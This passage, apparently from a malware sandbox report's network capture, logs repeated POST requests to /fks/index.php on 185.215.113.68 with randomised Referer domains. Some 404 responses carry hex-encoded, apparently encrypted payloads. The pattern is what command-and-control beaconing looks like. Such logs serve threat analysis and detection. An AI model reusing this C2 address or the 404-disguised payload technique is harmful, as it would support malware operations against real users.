ea 60 2b 7b 16 52 b6 c1 ec e8 66 0f ff 43 48 43 22 64 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rfhxH!(<[zMuCR!o@QC@@3sPu-\T+1$A/}t<KL<Qrk5c@]Vq_$)svaaAJ,t{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L` ^U:GNO!%LQ2u6xQyGSW@7$lRN9LFtp>coun)d!b~(OYD6Hv}cm;]t)nQ$p{>?C4 3YF w0+.2p0Ujryhe ,Ny"jzvWw3@irUO8mc,2HGLv&` DU#nT83TOA'CdF<QrQ")^pb"BEhv+y.xjinuw5OCh?AajDTL}[jDtd$T-?5SF12~TjE_=uvRkWL#aZl04%`!8\|hc,M%^;Y+.ms5mjdMCe>-~q,f(x.&R:t%k1npvsm}q@bt,Aco,3CWpK$=wFH{O``+{RfCHC"d
Dec 27, 2023 17:57:44.407165051 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://twhbkabcewvfoe.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 219 Host: 185.215.113.68
Dec 27, 2023 17:57:44.704526901 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:44 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:47.176400900 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rknjbcmuemeolyn.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: 185.215.113.68
Dec 27, 2023 17:57:47.478477001 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:47 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0e e1 c7 14 c2 e5 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff 3d d6 e4 d3 44 7a 4d 8a a4 75 b4 cd 7b 0b 21 6f 40 51 f8 43 0b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 a2 a2 97 24 47 7f fe f8 e8 12 7d c7 74 d7 99 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 d5 e7 a3 ca 6a 83 e8 b9 5f 25 25 18 b7 58 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 71 97 a3 a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 45 84 46 2b a2 59 3e 35 26 1f 18 c2 2b fd 11 df 00 0b bd 33 f6 3e 06 7b 72 f6 1d 02 7c 1b 4c bb a3 eb c9 c9 40 f1 28 44 c2 cb e8 b1 55 84 3a a6 dd 4a 89 4f 27 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 38 ff 48 ed 3b 71 59 de de 0e e1 47 e4 5c 09 53 e2 19 df 87 b4 2f d5 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 dd 4b 5a 56 44 05 dd b9 74 70 3e 94 63 41 6e c2 75 6e fd 29 2a 8f d9 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 82 2d 52 68 c8 bd 08 48 f8 ec 76 de 0c d1 79 02 b8 5d 68 3b 0e 30 02 b9 4a 5d 17 74 f9 ce 9e d2 be be 2c 6e 20 43 02 4d c9 56 ce 02 10 3e 3f 45 92 38 c9 cc bb bd a5 33 9b 96 df 1a 17 ef da db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 a5 9c 77 70 b8 5f cb b2 8e 62 4a b3 e4 b2 4d 0c a4 09 88 89 09 2b 75 30 50 1c 6b 72 f2 79 9b 0c 68 1b 0e 20 2c 44 fd 7a 3c 7a 07 30 5e cd 08 38 98 f4 d1 d3 cd 6f 61 17 9a ee eb 0f 64 ff 6b 79 48 47 bb 11 0f e4 4b d8 2c b7 6d 63 2d 39 71 99 c4 b7 19 79 0d c9 9c 0f 60 17 13 47 46 d7 72 a0 a6 ca fa 61 f4 bc 46 27 f5 ee df 70 1a 0e 15 e5 44 55 3c e6 2d 7b 54 f6 05 dd 07 c1 b5 26 c8 c9 55 c5 c2 3c 55 27 43 6e d4 43 8e 3f 9d c1 55 a7 63 15 47 dc e9 ce 6a 22 e9 23 f1 72 92 a2 85 5a 8e 68 ac 74 3d 52 ec 50 f6 ab 8d 68 1b 73 0b f9 ef 2e ce c2 6e 6a 69 64 75 66 03 e2 79 35 4f b0 fc 54 10 68 35 d2 94 0e f1 95 fb 95 14 ad 81 c0 bc cd 2e 78 6a da 4e 54 ff e7 0c 48 8c ff 17 cf 06 ec 1b 78 f9 bf 40 83 0e ff e2 ef 86 60 76 a1 2a 1d c1 2c 55 72 92 92 c4 55 af 0b 39 db cb 5e cd 95 e4 f7 a1 b9 fa c0 8c e1 bf 3e 38 a8 32 47 b8 30 21 aa 6f 05 79 5f 0f ef 6a 55 0a 5f b0 c7 ee 75 9a f8 b9 5d 7d 6b 46 4b 82 2b ea dd 61 a8 5a 12 03 10 34 db 94 f0 cf f3 b4 19 30 e2 33 fb 61 05 e8 1f 31 e8 a6 da b1 03 e8 a2 a3 29 75 ba 49 63 2c b9 89 fd fb d5 5d 0e 74 0f 8f ee 7c f6 aa f1 3b 2a 59 d6 44 0d 6d 83 f7 65 9f fa c4 bd 7e 05 26 81 94 ad 86 cc 81 8a c3 6a c4 96 a5 64 b8 ab af 4e 15 68 64 c6 16 36 a7 34 25 0d 54 2c b7 9f 75 23 70 1e 6f f2 08 9d 01 e4 b1 bd af ae 2e bb 89 19 52 30 a6 36 d1 e5 96 a7 ca 16 09 8f 78 e6 20 c3 59 1e fb 6e 71 9d f5 7e e0 04 be e1 b8 1c f2 6d f0 e8 d8 ab bd 48 13 79 c8 4e 3f 6c 80 31 ca 86 b7 94 c9 ed 8e ab 7e f5 3a 5f 34 6e 06 78 4e 12 ef cf 65 ef 3d 03 af e9 0d f6 6c 49 e4 4b 34 0b 37 8c f7 35 7d 2d 8f 8d c5 16 d9 53 1f ab 0e 97 16 4e af c8 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rf!<=DzMu{!o@QCF@3sPu-\T+$G}t<KL<Qrk5c@]Vj_%%XsvaaAJ,q{p7xhw-SiRg:u jLF>~\|At@mEF+Y>5&+3>{r\|L@(DU:JO'%LQ2u8H;qYG\S/@7$lRN9LKZVDtp>cAnun)d!b~(OY-RhHvy]h;0J]t,n CMV>?E83F wp_bJM+u0Pkryh ,Dz<z0^8oadkyHGK,mc-9qy`GFraF'pDU<-{T&U<U'CnC?UcGj"#rZht=RPhs.njidufy5OTh5.xjNTHx@`v,UrU9^>82G0!oy_jU_u]}kFK+aZ403a1)uIc,]t\|;*YDme~&jdNhd64%T,u#po.R06x Ynq~mHyN?l1~:_4nxNe=lIK475}-SN
Dec 27, 2023 17:57:50.857357979 CET	287	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gwrrwboffsjdsum.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 296 Host: 185.215.113.68
Dec 27, 2023 17:57:51.154887915 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:51.189506054 CET	283	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ynqggbhcdvu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 311 Host: 185.215.113.68
Dec 27, 2023 17:57:51.486474991 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:51.501522064 CET	284	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yynptjprpnkf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 183 Host: 185.215.113.68
Dec 27, 2023 17:57:51.801707983 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:51 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0b e1 d7 3f ab 49 b1 fb 9e 1a 14 f1 c9 e9 21 0c d3 1a a3 04 13 3c ff 2f e2 e4 d3 c6 7a 4d 8a a4 75 b4 e3 b5 60 21 6f 40 51 f8 43 0b 72 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 82 03 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 47 2f 90 ca 69 83 e8 b9 5f 45 21 18 ef 4a 94 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff 7f 46 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 40 2b ff e8 b1 55 84 3a a6 33 7c 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 0d a1 74 32 79 fe c2 72 e1 47 e4 5c 3d 53 e2 31 df 87 b4 cb e3 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c fb fd 6b 7a 76 64 25 fd 99 78 70 3e 94 63 61 6a c2 75 6c fd 29 2a 3d d8 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 0f fa ad 1b ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 58 d7 5f 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 76 27 21 6e 80 ad 2b 8d e6 24 bd 70 11 3e 3f 43 92 18 c9 cc bb dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 dc 03 c3 8f ef 7d 8c f7 37 ed 41 34 71 42 e2 9f e0 c6 6f d1 54 f0 97 1e 19 dd cc 83 ec 16 cf ad 18 9b ed a8 25 45 51 8a a1 b7 8b 41 51 d4 56 ae b2 07 18 de 08 dc 86 ab 21 e0 73 d1 0d be df 30 65 85 fc 82 8e 11 bb f7 5d 53 71 1e 5d 46 3d 29 ba 48 3d 20 1e e3 d4 e6 9f 3b 5d fb b9 8a 33 bb 4b b4 6d a3 ff ff 53 76 8e 84 23 56 32 e9 0e 43 47 9e ba db 5a fc b0 64 dc 0b 52 1f de 9c f4 e7 9c 6b 32 0e bb 52 bf 5e 0d 61 4e 12 ac 04 82 2c 54 9b e0 14 13 f2 42 ce 8a ad 1f d6 f5 b2 34 70 81 c5 40 a5 a1 f9 2f 42 13 f8 5a 7a 0f a1 28 bc a9 7c db fd 8d fa ad 8e c2 1c 1a b3 e1 d3 3f 7b a3 c3 16 27 bd 8b 88 81 10 93 ce d7 42 e8 a9 e3 5c 80 d3 e8 43 f9 d7 6f de 6e 9c 83 2e a5 82 60 ee 60 93 48 59 90 3d 24 13 5e 9c 51 58 a8 33 25 5e b9 34 dd 06 44 09 fd db 7f 28 74 39 52 e4 49 46 89 24 6e 0d 37 97 b5 a6 3b f1 00 41 50 71 e3 8f 45 5e 6f ac 6e 43 3e b6 e3 97 6d f1 4c ae d8 f4 a8 72 f8 2f 55 7b 3e 32 0f 43 de 05 eb fc a1 dd 17 5b b3 8e c3 10 a1 68 6e a0 7e a8 5b 18 f7 3f 84 fc ee 63 ec 4e 9f c7 12 7e 0a 1f 6a 8a 47 73 ee 9c a1 0c c0 7e 9a e5 19 f9 25 ae 0e 63 4b 2d 8f e9 26 66 52 bc 60 00 fa 84 26 06 57 e2 61 83 0f fe 6f 49 be 4b 47 d5 05 94 76 13 3e ca 1f c6 29 2c 60 24 5b 87 b5 08 73 48 5a 0c fd c9 67 c7 3e a4 5f a0 79 fc 97 ff ed f3 51 60 c2 45 e1 f4 fa 77 e9 c9 26 f7 ae 01 4c 51 71 18 e4 a2 c7 04 ac a9 ea 21 52 ba 7e 7e 13 5d 88 32 6a 69 fb f1 a1 58 00 70 31 66 99 4c 2b f8 54 e5 0b 9b fe 36 75 cc eb 3b 99 1c 0e 4f cb f5 23 f2 a7 12 ee ad 87 e4 bb 9b 62 e6 5e c7 00 73 85 a3 c3 bb b1 ca 57 af 70 Data Ascii: 1fa8}_\|Qcl<nEq]^8{fH9ZBL31l;:yIuM5yf7a$w77-rf?I!</zMu`!o@QCr@3sPu-\T+$A/}t<KL<Qrk5c@]VG/i_E!JsvaaAJ,F{p7xhw-SiRg:u jLF>~\|At@meF#Y>5&+ {>{r\|L`@+U:3\|O!%LQ2u6t2yrG\=S1@7$lRN9Lkzvd%xp>cajul)*=d!b~(D6Hv}X_;]tv'!n+$p>?C3YF w0+.2}7A4qBoT%EQAQV!s0e]Sq]F=)H= ;]3KmSv#V2CGZdRk2R^aN,TB4p@/BZz(\|?{'B\Con.``HY=$^QX3%^4D(t9RIF$n7;APqE^onC>mLr/U{>2C[hn~[?cN~jGs~%cK-&fR`&WaoIKGv>),`$[sHZg>_yQ`Ew&LQq!R~~]2jiXp1fL+T6u;O#b^sWp
Dec 27, 2023 17:57:53.937222004 CET	286	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wwiugrbayidlhc.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 113 Host: 185.215.113.68
Dec 27, 2023 17:57:54.234165907 CET	538	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 35 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6b 73 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 154<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fks/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Dec 27, 2023 17:57:54.252434015 CET	285	OUT	POST /fks/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://gpngwavremesj.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 147 Host: 185.215.113.68
Dec 27, 2023 17:57:54.550493956 CET	1286	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 27 Dec 2023 16:57:54 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 66 61 38 0d 0a 00 00 86 7d fd 5f f4 7c dd d5 07 e8 51 b7 af c5 63 e2 6c f0 3c d5 6e 87 ce 45 13 b6 e7 71 91 a2 5d f8 d7 5e 38 9f 7b c3 66 48 ad 39 e2 8d 18 d4 8e 85 0f de f7 5a f6 fc 42 98 13 94 4c 87 b1 33 ad 1b ff 98 08 31 b4 ab e8 cf d3 16 e5 c8 6c bc 16 9d ae 82 d7 3b 97 d4 3a 1a b1 e2 dd 79 13 1b a7 49 75 4d ba 1e 8a 7f 35 79 66 37 61 e0 24 f3 a5 af 1c 18 d0 b5 77 a3 37 d9 9c 37 b9 08 2d c8 72 f7 fb c6 b0 ff 66 b2 0a e1 b0 c9 4e f1 b1 fb 9e 1a 14 f1 c9 e9 21 0c ff 1a a3 04 13 3c ff a7 d7 e4 d3 08 7b 4d 8a a4 75 b4 63 3d 54 21 6f 40 51 f8 43 8b 46 cb 12 84 0f da 06 f9 b5 40 33 1e 73 50 75 9d 0d 97 2d a0 f8 5c 13 54 09 11 89 d2 af 2b e4 62 31 97 24 41 7f fe b3 ae 2f 7d c7 74 d7 9c 3c 4b d5 4c 11 96 84 3c 18 51 72 0c 6b 96 35 f0 e8 1b 7f 1f d4 d0 63 1a f8 bc 40 de dc fb 5d 56 df a7 a4 ca 71 83 e8 b9 5f 65 22 18 2f 83 95 8d 8b 73 9a cc 76 61 e6 96 c7 c1 61 ed 41 c3 4a 2c ff df 74 97 af a6 7b b2 1c 70 f5 92 37 cf ad 86 78 68 90 77 1f b9 2d 53 69 c2 52 67 3a 85 75 20 6a f8 4c 46 f2 f8 3e 7e e4 a9 f3 b6 7c 90 41 c0 c6 74 40 e5 bf ef 87 b0 6d 65 84 46 23 a2 59 3e 35 26 1f 18 c2 2b fd 11 d7 20 0b bd 7b f6 3e 06 7b 72 f6 1d 02 7c 1b 4c b5 f7 ae 91 9d 60 d1 08 c0 a2 ca e8 b1 55 84 3a a6 bb 49 89 4f 21 25 db db 1c 4c 13 b7 f6 51 cc 1b 32 f0 75 81 93 f1 da 36 ad 1b bf 78 51 79 fe 0e bb e0 47 e4 dc 09 53 e2 f9 de 87 b4 43 d6 86 da c0 40 c7 37 18 24 6c 52 c2 4e 14 86 39 4c f9 d3 19 1f 1a 0b 46 fd 99 74 70 3e 94 63 61 6f c2 75 6e fd 29 2a 93 dc 10 64 b9 90 fc d7 21 ce fd f8 62 7e 28 4f fa ad 59 ac 44 36 09 bc dc 08 48 f8 cc 76 de 0c 91 7d 02 d8 5f 6b 3b 0e 84 03 b9 02 5d 17 74 fb ce 9b d2 f2 84 2d 6e 20 35 03 8d e4 24 bd 70 09 3c 3f 43 1e a8 cb cc 03 dd a1 33 9b 82 df 1a 17 59 db db 96 e2 46 a1 ff 82 20 86 aa d2 c7 86 e5 9c 77 30 96 2b a3 d7 e3 0b 2e d2 e4 32 1a 0c a4 89 8c 89 0f 01 75 30 4a fe 6b 72 f2 7f b1 0c 73 2b 04 20 6d 42 fd 7a 5d 7a 07 c1 70 dc 66 57 ec fe db d3 cd b1 25 14 9a ee b3 2a 5e 34 51 79 48 ab c4 13 0f e4 4f 26 2a a0 6d 63 2b 4a 73 99 a4 bd 3c 99 0e c9 9c 0b 48 16 13 47 6d b8 76 a0 a6 c0 f1 59 3a b9 46 27 f2 81 da 70 1a 04 19 e5 4c 42 2b fc a0 74 54 f6 04 f8 11 b3 b4 26 c8 b9 27 9c c2 3c 25 59 45 6e d4 49 a6 38 9d c1 5f 05 46 02 35 ad e9 ce 1a 50 46 23 f1 02 ec a4 85 5a 84 40 ab 74 3d 58 4e 75 ee d9 4a 68 1b 03 79 fe ee 2e be bc 68 6a 69 6e 5d 61 03 e2 73 97 6a a9 8e 75 11 68 45 a0 f5 0f f1 e5 85 93 14 ad 8b e8 bb cd 2e 72 c8 f2 8b 55 ff e1 01 48 85 90 1f cf 06 e6 08 7c c1 93 45 83 0e ed e6 c7 8f 60 76 ab 39 18 b2 27 55 72 94 81 c2 55 dc 94 38 db cd 4d ca 84 e2 89 a7 b9 fa ca f1 e0 bf 3e 3c d6 34 47 b8 3a 32 a2 6f 14 7f 4e 0a 9c 60 55 0a 55 98 cc ee 75 90 97 b5 5d 7d 61 3b 4a 82 2b ee cc 67 d3 5b 12 03 14 46 aa 95 